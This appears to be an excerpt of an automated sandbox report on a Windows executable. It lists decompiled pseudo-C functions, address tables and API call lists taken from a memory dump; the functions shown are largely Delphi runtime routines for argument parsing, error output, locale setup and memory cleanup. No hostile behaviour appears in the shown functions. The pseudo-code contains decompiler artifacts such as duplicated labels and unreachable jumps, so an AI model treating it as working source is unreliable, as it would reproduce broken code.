    0x0040cb96
    0x0040cbac
    0x0040cbc2
    0x0040cbd8
    0x0040cbee
    0x0040cc04
    0x0040cc1a
    0x0040cc2a
    0x0040cc30
    0x0040cc37

    APIs
    • GetModuleHandleA.KERNEL32(oleaut32.dll), ref: 0040CA49
      • Part of subcall function 0040CA14: GetProcAddress.KERNEL32(00000000), ref: 0040CA2D
    Strings
    Memory Dump Source
    • Source File: 00000012.00000002.1543762025.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_18_2_400000_obtG43AWHP.jbxd
    Function 00402858, Relevance: 16.6, APIs: 9, Strings: 2, Instructions: 109
    C-Code - Quality: 100%
    			E00402858(CHAR* __eax, intOrPtr* __edx) {
				char _t5;
				char _t6;
				CHAR* _t7;
				char _t9;
				CHAR* _t11;
				char _t14;
				CHAR* _t15;
				char _t17;
				CHAR* _t19;
				CHAR* _t22;
				CHAR* _t23;
				CHAR* _t32;
				intOrPtr _t33;
				intOrPtr* _t34;
				void* _t35;
				void* _t36;

				_t34 = __edx;
				_t22 = __eax;
				while(1) {
					L2:
					_t5 =  *_t22;
					if(_t5 != 0 && _t5 <= 0x20) {
						_t22 = CharNextA(_t22);
					}
					L2:
					_t5 =  *_t22;
					if(_t5 != 0 && _t5 <= 0x20) {
						_t22 = CharNextA(_t22);
					}
					L4:
					if( *_t22 != 0x22 || _t22[1] != 0x22) {
						_t36 = 0;
						_t32 = _t22;
						while(1) {
							_t6 =  *_t22;
							if(_t6 <= 0x20) {
								break;
							}
							if(_t6 != 0x22) {
								_t7 = CharNextA(_t22);
								_t36 = _t36 + _t7 - _t22;
								_t22 = _t7;
								continue;
							}
							_t22 = CharNextA(_t22);
							while(1) {
								_t9 =  *_t22;
								if(_t9 == 0 || _t9 == 0x22) {
									break;
								}
								_t11 = CharNextA(_t22);
								_t36 = _t36 + _t11 - _t22;
								_t22 = _t11;
							}
							if( *_t22 != 0) {
								_t22 = CharNextA(_t22);
							}
						}
						E00404478(_t34, _t36);
						_t23 = _t32;
						_t33 =  *_t34;
						_t35 = 0;
						while(1) {
							_t14 =  *_t23;
							if(_t14 <= 0x20) {
								break;
							}
							if(_t14 != 0x22) {
								_t15 = CharNextA(_t23);
								if(_t15 <= _t23) {
									continue;
								} else {
									goto L27;
								}
								do {
									L27:
									 *((char*)(_t33 + _t35)) =  *_t23;
									_t23 =  &(_t23[1]);
									_t35 = _t35 + 1;
								} while (_t15 > _t23);
								continue;
							}
							_t23 = CharNextA(_t23);
							while(1) {
								_t17 =  *_t23;
								if(_t17 == 0 || _t17 == 0x22) {
									break;
								}
								_t19 = CharNextA(_t23);
								if(_t19 <= _t23) {
									continue;
								} else {
									goto L21;
								}
								do {
									L21:
									 *((char*)(_t33 + _t35)) =  *_t23;
									_t23 =  &(_t23[1]);
									_t35 = _t35 + 1;
								} while (_t19 > _t23);
							}
							if( *_t23 != 0) {
								_t23 = CharNextA(_t23);
							}
						}
						return _t23;
					} else {
						_t22 =  &(_t22[2]);
						continue;
					}
				}
			}



















    0x0040285c
    0x0040285e
    0x0040286a
    0x0040286a
    0x0040286a
    0x0040286e
    0x00402868
    0x00402868
    0x0040286a
    0x0040286a
    0x0040286e
    0x00402868
    0x00402868
    0x00402874
    0x00402877
    0x00402884
    0x00402886
    0x004028cd
    0x004028cd
    0x004028d1
    0x00000000
    0x00000000
    0x0040288c
    0x004028c0
    0x004028c9
    0x004028cb
    0x00000000
    0x004028cb
    0x00402894
    0x004028a6
    0x004028a6
    0x004028aa
    0x00000000
    0x00000000
    0x00402899
    0x004028a2
    0x004028a4
    0x004028a4
    0x004028b3
    0x004028bb
    0x004028bb
    0x004028b3
    0x004028d7
    0x004028dc
    0x004028de
    0x004028e0
    0x00402935
    0x00402935
    0x00402939
    0x00000000
    0x00000000
    0x004028e6
    0x00402921
    0x00402928
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x0040292a
    0x0040292a
    0x0040292c
    0x0040292f
    0x00402930
    0x00402931
    0x00000000
    0x0040292a
    0x004028ee
    0x00402907
    0x00402907
    0x0040290b
    0x00000000
    0x00000000
    0x004028f3
    0x004028fa
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x004028fc
    0x004028fc
    0x004028fe
    0x00402901
    0x00402902
    0x00402903
    0x004028fc
    0x00402914
    0x0040291c
    0x0040291c
    0x00402914
    0x00402941
    0x0040287f
    0x0040287f
    0x00000000
    0x0040287f
    0x00402877

    APIs
    • CharNextA.USER32(00000000), ref: 00402863
    • CharNextA.USER32(00000000), ref: 0040288F
    • CharNextA.USER32(00000000), ref: 00402899
    • CharNextA.USER32(00000000), ref: 004028B6
    • CharNextA.USER32(00000000), ref: 004028C0
    • CharNextA.USER32(00000000), ref: 004028E9
    • CharNextA.USER32(00000000), ref: 004028F3
    • CharNextA.USER32(00000000), ref: 00402917
    • CharNextA.USER32(00000000), ref: 00402921
    Strings
    Memory Dump Source
    • Source File: 00000012.00000002.1543762025.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_18_2_400000_obtG43AWHP.jbxd
    Function 0040A4A4, Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 56
    C-Code - Quality: 100%
    			E0040A4A4(void* __edx, void* __edi, void* __fp0) {
				void _v1024;
				char _v1088;
				long _v1092;
				void* _t12;
				char* _t14;
				intOrPtr _t16;
				intOrPtr _t18;
				intOrPtr _t24;
				long _t32;

				E0040A31C(_t12,  &_v1024, __edx, __fp0, 0x400);
				_t14 =  *0x45308c; // 0x454044
				if( *_t14 == 0) {
					_t16 =  *0x452f6c; // 0x405f30
					_t9 = _t16 + 4; // 0xffe9
					_t18 =  *0x454660; // 0x400000
					LoadStringA(E00404DCC(_t18),  *_t9,  &_v1088, 0x40);
					return MessageBoxA(0,  &_v1024,  &_v1088, 0x2010);
				}
				_t24 =  *0x452f90; // 0x454214
				E00402784(E00402A8C(_t24));
				CharToOemA( &_v1024,  &_v1024);
				_t32 = E00407764( &_v1024, __edi);
				WriteFile(GetStdHandle(0xfffffff4),  &_v1024, _t32,  &_v1092, 0);
				return WriteFile(GetStdHandle(0xfffffff4), 0x40a568, 2,  &_v1092, 0);
			}












    0x0040a4b3
    0x0040a4b8
    0x0040a4c0
    0x0040a527
    0x0040a52c
    0x0040a530
    0x0040a53b
    0x00000000
    0x0040a551
    0x0040a4c2
    0x0040a4cc
    0x0040a4db
    0x0040a4eb
    0x0040a4fe
    0x00000000

    APIs
      • Part of subcall function 0040A31C: VirtualQuery.KERNEL32(?,?,0000001C), ref: 0040A339
      • Part of subcall function 0040A31C: GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 0040A35D
      • Part of subcall function 0040A31C: GetModuleFileNameA.KERNEL32(00400000,?,00000105), ref: 0040A378
      • Part of subcall function 0040A31C: LoadStringA.USER32(00000000,0000FFE8,?,00000100), ref: 0040A40E
    • CharToOemA.USER32(?,?), ref: 0040A4DB
    • GetStdHandle.KERNEL32(000000F4,?,00000000,?,00000000,?,?), ref: 0040A4F8
    • WriteFile.KERNEL32(00000000,000000F4,?,00000000,?), ref: 0040A4FE
    • GetStdHandle.KERNEL32(000000F4,0040A568,00000002,?,00000000,00000000,000000F4,?,00000000,?,00000000,?,?), ref: 0040A513
    • WriteFile.KERNEL32(00000000,000000F4,0040A568,00000002,?), ref: 0040A519
    • LoadStringA.USER32(00000000,0000FFE9,?,00000040), ref: 0040A53B
    • MessageBoxA.USER32(00000000,?,?,00002010), ref: 0040A551
    Strings
    Memory Dump Source
    • Source File: 00000012.00000002.1543762025.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_18_2_400000_obtG43AWHP.jbxd
    Function 00401A74, Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 62
    C-Code - Quality: 72%
    			E00401A74() {
				void* _t2;
				void* _t3;
				void* _t14;
				intOrPtr* _t19;
				intOrPtr _t23;
				intOrPtr _t26;
				intOrPtr _t28;

				_t26 = _t28;
				if( *0x4545bc == 0) {
					return _t2;
				} else {
					_push(_t26);
					_push(E00401B4A);
					_push( *[fs:edx]);
					 *[fs:edx] = _t28;
					if( *0x454045 != 0) {
						_push(0x4545c4);
						L0040130C();
					}
					 *0x4545bc = 0;
					_t3 =  *0x45461c; // 0x0
					LocalFree(_t3);
					 *0x45461c = 0;
					_t19 =  *0x4545e4; // 0x4545e4
					while(_t19 != 0x4545e4) {
						_t1 = _t19 + 8; // 0x0
						VirtualFree( *_t1, 0, 0x8000);
						_t19 =  *_t19;
					}
					E00401374(0x4545e4);
					E00401374(0x4545f4);
					E00401374(0x454620);
					_t14 =  *0x4545dc; // 0x0
					while(_t14 != 0) {
						 *0x4545dc =  *_t14;
						LocalFree(_t14);
						_t14 =  *0x4545dc; // 0x0
					}
					_pop(_t23);
					 *[fs:eax] = _t23;
					_push(0x401b51);
					if( *0x454045 != 0) {
						_push(0x4545c4);
						L00401314();
					}
					_push(0x4545c4);
					L0040131C();
					return 0;
				}
			}










    0x00401a75
    0x00401a7f
    0x00401b53
    0x00401a85
    0x00401a87
    0x00401a88
    0x00401a8d
    0x00401a90
    0x00401a9a
    0x00401a9c
    0x00401aa1
    0x00401aa1
    0x00401aa6
    0x00401aad
    0x00401ab3
    0x00401aba
    0x00401abf
    0x00401ad9
    0x00401ace
    0x00401ad2
    0x00401ad7
    0x00401ad7
    0x00401ae6
    0x00401af0
    0x00401afa
    0x00401aff
    0x00401b06
    0x00401b0a
    0x00401b11
    0x00401b16
    0x00401b1b
    0x00401b21
    0x00401b24
    0x00401b27
    0x00401b33
    0x00401b35
    0x00401b3a
    0x00401b3a
    0x00401b3f
    0x00401b44
    0x00401b49
    0x00401b49

    APIs
    • RtlEnterCriticalSection.KERNEL32(004545C4,00000000,00401B4A), ref: 00401AA1
    • LocalFree.KERNEL32(00000000,00000000,00401B4A), ref: 00401AB3
    • VirtualFree.KERNEL32(00000000,00000000,00008000,00000000,00000000,00401B4A), ref: 00401AD2
    • LocalFree.KERNEL32(00000000,00000000,00000000,00008000,00000000,00000000,00401B4A), ref: 00401B11
    • RtlLeaveCriticalSection.KERNEL32(004545C4,00401B51,00000000,00000000,00401B4A), ref: 00401B3A
    • RtlDeleteCriticalSection.KERNEL32(004545C4,00401B51,00000000,00000000,00401B4A), ref: 00401B44
    Strings
    Memory Dump Source
    • Source File: 00000012.00000002.1543762025.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_18_2_400000_obtG43AWHP.jbxd
    Function 0040B514, Relevance: 12.5, APIs: 1, Strings: 6, Instructions: 201
    C-Code - Quality: 72%
    			E0040B514(void* __ebx, void* __edx, void* __edi, void* __esi) {
				char _v8;
				char _v12;
				char _v16;
				char _v20;
				char _v24;
				char _v28;
				char _v32;
				char _v36;
				char _v40;
				char _v44;
				char _v48;
				char _v52;
				char _v56;
				char _v60;
				char _v64;
				char _v68;
				void* _t104;
				void* _t111;
				void* _t133;
				intOrPtr _t183;
				intOrPtr _t193;
				intOrPtr _t194;

				_t191 = __esi;
				_t190 = __edi;
				_t193 = _t194;
				_t133 = 8;
				do {
					_push(0);
					_push(0);
					_t133 = _t133 - 1;
				} while (_t133 != 0);
				_push(__ebx);
				_push(_t193);
				_push(0x40b7df);
				_push( *[fs:eax]);
				 *[fs:eax] = _t194;
				E0040B3A0();
				E00409E60(__ebx, __edi, __esi);
				_t196 =  *0x454744;
				if( *0x454744 != 0) {
					E0040A038(__esi, _t196);
				}
				_t132 = GetThreadLocale();
				E00409DB0(_t43, 0, 0x14,  &_v20);
				E00403EDC(0x454678, _v20);
				E00409DB0(_t43, 0x40b7f4, 0x1b,  &_v24);
				 *0x45467c = E00407174(0x40b7f4, 0, _t196);
				E00409DB0(_t132, 0x40b7f4, 0x1c,  &_v28);
				 *0x45467d = E00407174(0x40b7f4, 0, _t196);
				 *0x45467e = E00409DFC(_t132, 0x2c, 0xf);
				 *0x45467f = E00409DFC(_t132, 0x2e, 0xe);
				E00409DB0(_t132, 0x40b7f4, 0x19,  &_v32);
				 *0x454680 = E00407174(0x40b7f4, 0, _t196);
				 *0x454681 = E00409DFC(_t132, 0x2f, 0x1d);
				E00409DB0(_t132, "m/d/yy", 0x1f,  &_v40);
				E0040A0E8(_v40, _t132,  &_v36, _t190, _t191, _t196);
				E00403EDC(0x454684, _v36);
				E00409DB0(_t132, "mmmm d, yyyy", 0x20,  &_v48);
				E0040A0E8(_v48, _t132,  &_v44, _t190, _t191, _t196);
				E00403EDC(0x454688, _v44);
				 *0x45468c = E00409DFC(_t132, 0x3a, 0x1e);
				E00409DB0(_t132, 0x40b828, 0x28,  &_v52);
				E00403EDC(0x454690, _v52);
				E00409DB0(_t132, 0x40b834, 0x29,  &_v56);
				E00403EDC(0x454694, _v56);
				E00403E88( &_v12);
				E00403E88( &_v16);
				E00409DB0(_t132, 0x40b7f4, 0x25,  &_v60);
				_t104 = E00407174(0x40b7f4, 0, _t196);
				_t197 = _t104;
				if(_t104 != 0) {
					E00403F20( &_v8, 0x40b84c);
				} else {
					E00403F20( &_v8, 0x40b840);
				}
				E00409DB0(_t132, 0x40b7f4, 0x23,  &_v64);
				_t111 = E00407174(0x40b7f4, 0, _t197);
				_t198 = _t111;
				if(_t111 == 0) {
					E00409DB0(_t132, 0x40b7f4, 0x1005,  &_v68);
					if(E00407174(0x40b7f4, 0, _t198) != 0) {
						E00403F20( &_v12, 0x40b868);
					} else {
						E00403F20( &_v16, 0x40b858);
					}
				}
				_push(_v12);
				_push(_v8);
				_push(":mm");
				_push(_v16);
				E00404208();
				_push(_v12);
				_push(_v8);
				_push(":mm:ss");
				_push(_v16);
				E00404208();
				 *0x454746 = E00409DFC(_t132, 0x2c, 0xc);
				_pop(_t183);
				 *[fs:eax] = _t183;
				_push(E0040B7E6);
				return E00403EAC( &_v68, 0x10);
			}

























    0x0040b514
    0x0040b514
    0x0040b515
    0x0040b517
    0x0040b51c
    0x0040b51c
    0x0040b51e
    0x0040b520
    0x0040b520
    0x0040b523
    0x0040b526
    0x0040b527
    0x0040b52c
    0x0040b52f
    0x0040b532
    0x0040b537
    0x0040b53c
    0x0040b543
    0x0040b545
    0x0040b545
    0x0040b54f
    0x0040b55e
    0x0040b56b
    0x0040b580
    0x0040b58f
    0x0040b5a4
    0x0040b5b3
    0x0040b5c6
    0x0040b5d9
    0x0040b5ee
    0x0040b5fd
    0x0040b610
    0x0040b625
    0x0040b630
    0x0040b63d
    0x0040b652
    0x0040b65d
    0x0040b66a
    0x0040b67d
    0x0040b692
    0x0040b69f
    0x0040b6b4
    0x0040b6c1
    0x0040b6c9
    0x0040b6d1
    0x0040b6e6
    0x0040b6f0
    0x0040b6f5
    0x0040b6f7
    0x0040b710
    0x0040b6f9
    0x0040b701
    0x0040b701
    0x0040b725
    0x0040b72f
    0x0040b734
    0x0040b736
    0x0040b748
    0x0040b759
    0x0040b772
    0x0040b75b
    0x0040b763
    0x0040b763
    0x0040b759
    0x0040b777
    0x0040b77a
    0x0040b77d
    0x0040b782
    0x0040b78f
    0x0040b794
    0x0040b797
    0x0040b79a
    0x0040b79f
    0x0040b7ac
    0x0040b7bf
    0x0040b7c6
    0x0040b7c9
    0x0040b7cc
    0x0040b7de

    APIs
      • Part of subcall function 0040B3A0: GetThreadLocale.KERNEL32 ref: 0040B3CA
      • Part of subcall function 0040B3A0: GetStringTypeA.KERNEL32(00000409,00000002,?,00000080,?), ref: 0040B494
      • Part of subcall function 0040B3A0: GetSystemMetrics.USER32(0000004A), ref: 0040B4BF
      • Part of subcall function 0040B3A0: GetSystemMetrics.USER32(0000002A), ref: 0040B4D0
      • Part of subcall function 00409E60: GetThreadLocale.KERNEL32(00000000,00409F73,?,?,?,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00409E7C
    • GetThreadLocale.KERNEL32(00000000,0040B7DF,?,?,00000000,00000000), ref: 0040B54A
      • Part of subcall function 00409DB0: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 00409DCE
      • Part of subcall function 00409DFC: GetLocaleInfoA.KERNEL32(00000000,0000000F,?,00000002,0000002C,?,?,00000000,0040B5C6,00000000,0040B7DF,?,?,00000000,00000000), ref: 00409E0F
      • Part of subcall function 0040A0E8: GetThreadLocale.KERNEL32(?,00000000,0040A2B2,?,?,?,?,00000000,00000000,00000000,00000000,00000000), ref: 0040A117
      • Part of subcall function 0040A038: GetThreadLocale.KERNEL32(?,00000000,0040A0CF,?,?,00000000), ref: 0040A050
      • Part of subcall function 0040A038: GetThreadLocale.KERNEL32(00000000,00000004,00000000,0040A0CF,?,?,00000000), ref: 0040A080
      • Part of subcall function 0040A038: EnumCalendarInfoA.KERNEL32(Function_00009F84,00000000,00000000,00000004), ref: 0040A08B
      • Part of subcall function 0040A038: GetThreadLocale.KERNEL32(00000000,00000003,00000000,0040A0CF,?,?,00000000), ref: 0040A0A9
      • Part of subcall function 0040A038: EnumCalendarInfoA.KERNEL32(Function_00009FC0,00000000,00000000,00000003), ref: 0040A0B4
    Strings
    Memory Dump Source
    • Source File: 00000012.00000002.1543762025.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_18_2_400000_obtG43AWHP.jbxd
    Function 0040DBC0, Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 139
    C-Code - Quality: 77%
    			E0040DBC0(short* __eax, intOrPtr __ecx, intOrPtr* __edx) {
				char _v260;
				char _v768;
				char _v772;
				short* _v776;
				intOrPtr _v780;
				char _v784;
				signed int _v788;
				signed short* _v792;
				char _v796;
				char _v800;
				intOrPtr* _v804;
				void* __ebp;
				signed char _t47;
				signed int _t54;
				void* _t62;
				intOrPtr* _t73;
				intOrPtr* _t91;
				void* _t93;
				void* _t95;
				void* _t98;
				void* _t99;
				intOrPtr* _t108;
				void* _t112;
				intOrPtr _t113;
				char* _t114;
				void* _t115;

				_t100 = __ecx;
				_v780 = __ecx;
				_t91 = __edx;
				_v776 = __eax;
				if(( *(__edx + 1) & 0x00000020) == 0) {
					E0040D7EC(0x80070057);
				}
				_t47 =  *_t91;
				if((_t47 & 0x00000fff) != 0xc) {
					_push(_t91);
					_push(_v776);
					L0040C5A0();
					return E0040D7EC(_v776);
				} else {
					if((_t47 & 0x00000040) == 0) {
						_v792 =  *((intOrPtr*)(_t91 + 8));
					} else {
						_v792 =  *((intOrPtr*)( *((intOrPtr*)(_t91 + 8))));
					}
					_v788 =  *_v792 & 0x0000ffff;
					_t93 = _v788 - 1;
					if(_t93 < 0) {
						L9:
						_push( &_v772);
						_t54 = _v788;
						_push(_t54);
						_push(0xc);
						L0040C9F4();
						_t113 = _t54;
						if(_t113 == 0) {
							E0040D544(_t100);
						}
						E0040DB18(_v776);
						 *_v776 = 0x200c;
						 *((intOrPtr*)(_v776 + 8)) = _t113;
						_t95 = _v788 - 1;
						if(_t95 < 0) {
							L14:
							_t97 = _v788 - 1;
							if(E0040DB34(_v788 - 1, _t115) != 0) {
								L0040CA0C();
								E0040D7EC(_v792);
								L0040CA0C();
								E0040D7EC( &_v260);
								_v780(_t113,  &_v260,  &_v800, _v792,  &_v260,  &_v796);
							}
							_t62 = E0040DB64(_t97, _t115);
						} else {
							_t98 = _t95 + 1;
							_t73 =  &_v768;
							_t108 =  &_v260;
							do {
								 *_t108 =  *_t73;
								_t108 = _t108 + 4;
								_t73 = _t73 + 8;
								_t98 = _t98 - 1;
							} while (_t98 != 0);
							do {
								goto L14;
							} while (_t62 != 0);
							return _t62;
						}
					} else {
						_t99 = _t93 + 1;
						_t112 = 0;
						_t114 =  &_v772;
						do {
							_v804 = _t114;
							_push(_v804 + 4);
							_t18 = _t112 + 1; // 0x1
							_push(_v792);
							L0040C9FC();
							E0040D7EC(_v792);
							_push( &_v784);
							_t21 = _t112 + 1; // 0x1
							_push(_v792);
							L0040CA04();
							E0040D7EC(_v792);
							 *_v804 = _v784 -  *((intOrPtr*)(_v804 + 4)) + 1;
							_t112 = _t112 + 1;
							_t114 = _t114 + 8;
							_t99 = _t99 - 1;
						} while (_t99 != 0);
						goto L9;
					}
				}
			}





























    0x0040dbc0
    0x0040dbcc
    0x0040dbd2
    0x0040dbd4
    0x0040dbde
    0x0040dbe5
    0x0040dbe5
    0x0040dbea
    0x0040dbf8
    0x0040dd71
    0x0040dd78
    0x0040dd79
    0x00000000
    0x0040dbfe
    0x0040dc01
    0x0040dc13
    0x0040dc03
    0x0040dc08
    0x0040dc08
    0x0040dc22
    0x0040dc2e
    0x0040dc31
    0x0040dc9e
    0x0040dca4
    0x0040dca5
    0x0040dcab
    0x0040dcac
    0x0040dcae
    0x0040dcb3
    0x0040dcb7
    0x0040dcb9
    0x0040dcb9
    0x0040dcc4
    0x0040dccf
    0x0040dcda
    0x0040dce3
    0x0040dce6
    0x0040dd02
    0x0040dd09
    0x0040dd14
    0x0040dd2b
    0x0040dd30
    0x0040dd44
    0x0040dd49
    0x0040dd5c
    0x0040dd5c
    0x0040dd65
    0x0040dce8
    0x0040dce8
    0x0040dce9
    0x0040dcef
    0x0040dcf5
    0x0040dcf7
    0x0040dcf9
    0x0040dcfc
    0x0040dcff
    0x0040dcff
    0x0040dd02
    0x00000000
    0x00000000
    0x00000000
    0x0040dd02
    0x0040dc33
    0x0040dc33
    0x0040dc34
    0x0040dc36
    0x0040dc3c
    0x0040dc3e
    0x0040dc4d
    0x0040dc4e
    0x0040dc58
    0x0040dc59
    0x0040dc5e
    0x0040dc69
    0x0040dc6a
    0x0040dc74
    0x0040dc75
    0x0040dc7a
    0x0040dc95
    0x0040dc97
    0x0040dc98
    0x0040dc9b
    0x0040dc9b
    0x00000000
    0x0040dc3c
    0x0040dc31

    APIs
    • SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 0040DC59
    • SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 0040DC75
    • SafeArrayCreate.OLEAUT32(0000000C,?,?), ref: 0040DCAE
    • SafeArrayPtrOfIndex.OLEAUT32(?,?,?), ref: 0040DD2B
    • SafeArrayPtrOfIndex.OLEAUT32(00000000,?,?), ref: 0040DD44
    • VariantCopy.OLEAUT32(?), ref: 0040DD79
    Strings
    Memory Dump Source
    • Source File: 00000012.00000002.1543762025.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_18_2_400000_obtG43AWHP.jbxd
    Function 00403C90, Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 38
    C-Code - Quality: 79%
    			E00403C90(void* __ecx) {
				long _v4;
				int _t3;

				if( *0x454044 == 0) {
					if( *0x419030 == 0) {
						_t3 = MessageBoxA(0, "Runtime error     at 00000000", "Error", 0);
					}
					return _t3;
				} else {
					if( *0x454218 == 0xd7b2 &&  *0x454220 > 0) {
						 *0x454230();
					}
					WriteFile(GetStdHandle(0xfffffff5), "Runtime error     at 00000000", 0x1e,  &_v4, 0);
					return WriteFile(GetStdHandle(0xfffffff5), E00403D18, 2,  &_v4, 0);
				}
			}





    0x00403c98
    0x00403cf8
    0x00403d08
    0x00403d08
    0x00403d0e
    0x00403c9a
    0x00403ca3
    0x00403cb3
    0x00403cb3
    0x00403ccf
    0x00403cf0
    0x00403cf0

    APIs
    • GetStdHandle.KERNEL32(000000F5,Runtime error at 00000000,0000001E,?,00000000,?,00403D5E,00000000,00000000,?,00000002,00403DFE,0040272B,00402773,00000000,00000000), ref: 00403CC9
    • WriteFile.KERNEL32(00000000,000000F5,Runtime error at 00000000,0000001E,?), ref: 00403CCF
    • GetStdHandle.KERNEL32(000000F5,00403D18,00000002,?,00000000,00000000,?,00403D5E,00000000,00000000,?,00000002,00403DFE,0040272B,00402773,00000000), ref: 00403CE4
    • WriteFile.KERNEL32(00000000,000000F5,00403D18,00000002,?), ref: 00403CEA
    • MessageBoxA.USER32(00000000,Runtime error at 00000000,Error,00000000), ref: 00403D08
    Strings
    Memory Dump Source
    • Source File: 00000012.00000002.1543762025.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_18_2_400000_obtG43AWHP.jbxd
    Function 0040B9A0, Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 41
    C-Code - Quality: 100%
    			E0040B9A0() {
				struct HINSTANCE__** _t2;
				void* _t3;
				struct HINSTANCE__** _t5;
				struct HRSRC__* _t7;
				struct HINSTANCE__** _t8;
				intOrPtr* _t11;
				intOrPtr* _t12;
				struct HINSTANCE__* _t13;

				_t2 =  *0x452f9c; // 0x45402c
				if( *_t2 != 0) {
					_t5 =  *0x452f9c; // 0x45402c
					_t7 = FindResourceA( *_t5, "DVCLAL", 0xa);
					_t8 =  *0x452f9c; // 0x45402c
					return LoadResource( *_t8, _t7);
				}
				_t3 = 0;
				_t11 =  *0x4530b8; // 0x419034
				_t12 =  *_t11;
				if(_t12 != 0) {
					while(1) {
						_t13 =  *(_t12 + 4);
						_t3 = LoadResource(_t13, FindResourceA(_t13, "DVCLAL", 0xa));
						if(_t3 != 0) {
							goto L5;
						}
						_t12 =  *_t12;
						if(_t12 != 0) {
							continue;
						}
						goto L5;
					}
				}
				L5:
				return _t3;
			}











    0x0040b9a3
    0x0040b9ab
    0x0040b9b4
    0x0040b9bc
    0x0040b9c2
    0x00000000
    0x0040b9ca
    0x0040b9d1
    0x0040b9d3
    0x0040b9d9
    0x0040b9dd
    0x0040b9df
    0x0040b9e8
    0x0040b9f3
    0x0040b9fa
    0x00000000
    0x00000000
    0x0040b9fc
    0x0040ba00
    0x00000000
    0x00000000
    0x00000000
    0x0040ba00
    0x0040b9df
    0x0040ba05
    0x0040ba05

    APIs
    • FindResourceA.KERNEL32(00400000,DVCLAL,0000000A), ref: 0040B9BC
    • LoadResource.KERNEL32(00400000,00000000,00400000,DVCLAL,0000000A,?,00416F00,00000000,0040BA1A,?,?,?,00416F00,00000000,0040BA89,004171A3), ref: 0040B9CA
    • FindResourceA.KERNEL32(?,DVCLAL,0000000A), ref: 0040B9EC
    • LoadResource.KERNEL32(?,00000000,?,00416F00,00000000,0040BA1A,?,?,?,00416F00,00000000,0040BA89,004171A3,00416F00,00000000,00417553), ref: 0040B9F3
    Strings
    Memory Dump Source
    • Source File: 00000012.00000002.1543762025.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_18_2_400000_obtG43AWHP.jbxd
    Function 00405945, Relevance: 9.0, APIs: 6, Instructions: 41
    C-Code - Quality: 100%
    			E00405945(void* __eax, void* __ebx, void* __ecx, intOrPtr* __edi) {
				long _t11;
				void* _t16;

				_t16 = __ebx;
				 *__edi =  *__edi + __ecx;
				 *((intOrPtr*)(__eax - 0x4545b4)) =  *((intOrPtr*)(__eax - 0x4545b4)) + __eax - 0x4545b4;
				 *0x419008 = 2;
				 *0x454014 = 0x4011a8;
				 *0x454018 = 0x4011b0;
				 *0x454046 = 2;
				 *0x454000 = E00404B04;
				if(E00402F5C() != 0) {
					_t3 = E00402F8C();
				}
				E00403050(_t3);
				 *0x45404c = 0xd7b0;
				 *0x454218 = 0xd7b0;
				 *0x4543e4 = 0xd7b0;
				 *0x45403c = GetCommandLineA();
				 *0x454038 = E004012C0();
				if((GetVersion() & 0x80000000) == 0x80000000) {
					 *0x4545b8 = E0040587C(GetThreadLocale(), _t16, __eflags);
				} else {
					if((GetVersion() & 0x000000ff) <= 4) {
						 *0x4545b8 = E0040587C(GetThreadLocale(), _t16, __eflags);
					} else {
						 *0x4545b8 = 3;
					}
				}
				_t11 = GetCurrentThreadId();
				 *0x454030 = _t11;
				return _t11;
			}





    0x00405945
    0x0040594a
    0x0040594f
    0x00405951
    0x00405958
    0x00405962
    0x0040596c
    0x00405973
    0x00405984
    0x00405986
    0x00405986
    0x0040598b
    0x00405990
    0x00405999
    0x004059a2
    0x004059b0
    0x004059ba
    0x004059ce
    0x00405a07
    0x004059d0
    0x004059de
    0x004059f6
    0x004059e0
    0x004059e0
    0x004059e0
    0x004059de
    0x00405a0c
    0x00405a11
    0x00405a16

    APIs
      • Part of subcall function 00402F5C: GetKeyboardType.USER32(00000000), ref: 00402F61
      • Part of subcall function 00402F5C: GetKeyboardType.USER32(00000001), ref: 00402F6D
    • GetCommandLineA.KERNEL32 ref: 004059AB
      • Part of subcall function 004012C0: GetStartupInfoA.KERNEL32 ref: 004012CA
    • GetVersion.KERNEL32 ref: 004059BF
    • GetVersion.KERNEL32 ref: 004059D0
    • GetThreadLocale.KERNEL32 ref: 004059EC
    • GetThreadLocale.KERNEL32 ref: 004059FD
      • Part of subcall function 0040587C: GetLocaleInfoA.KERNEL32(?,00001004,?,00000007,00000000,004058E2), ref: 004058A2
    • GetCurrentThreadId.KERNEL32 ref: 00405A0C
      • Part of subcall function 00402F8C: RegOpenKeyExA.ADVAPI32(80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 00402FAE
      • Part of subcall function 00402F8C: RegQueryValueExA.ADVAPI32(?,FPUMaskValue,00000000,00000000,?,00000004,00000000,00402FFD,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 00402FE1
      • Part of subcall function 00402F8C: RegCloseKey.ADVAPI32(?,00403004,00000000,?,00000004,00000000,00402FFD,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 00402FF7
    Memory Dump Source
    • Source File: 00000012.00000002.1543762025.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
